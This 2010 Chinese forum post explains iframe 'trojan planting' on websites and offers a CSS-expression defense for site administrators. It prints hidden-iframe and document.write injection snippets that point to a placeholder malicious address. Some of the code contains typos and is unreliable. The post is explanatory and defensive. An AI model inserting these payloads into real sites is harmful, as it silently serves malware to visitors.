-
-
[原创]防框架挂马安全代码
-
发表于:
2010-3-26 09:09
4524
-
我们来看看框架挂马有那些:第一是普通的做法<iframe src="您的网马地址" height=0 width=0></iframe>;
第二种是JS 调用框架挂马,先写一个JS文件(命名为JS.JS)document.write('<iframe src="您的网马地址" height=0 w idth=0></frame>') 然后写把如下代码插入网站首页中调用JS.JS: <script> src=js.js</script>,这样别人浏览被我们插入代码的网页时,您的网马就会自动下载运行,也就达到挂马的目的。上面这些是一些比较简单普遍的挂马方式,还有比较深层的挂马方式(比如IIS服务器挂马,ASP封装挂马,window.status伪装挂马等等)最近黑基这边事情比较多,我有时间会给大家发上来,给大家参考。
站在一名网站管理员的角度,我们应该怎样防御这样呢?我们可以这样,在我们的网页中插入如下代码
:<style>iframe {v:expression(this.src='about:blank' this.outerhtml='');}</style> 这样所有的框架挂马都被屏蔽,让那些小菜的马无法运行。
好了,今天就些吧,主要是对付那些小菜鸟(深层次的防御涉及到服务器的安全加固),如果你的网站经常给人挂马,可以在加固服务器安全的基础上试试这种防御方法,让你的网站更加安全。
[课程]Android-CTF解题方法汇总!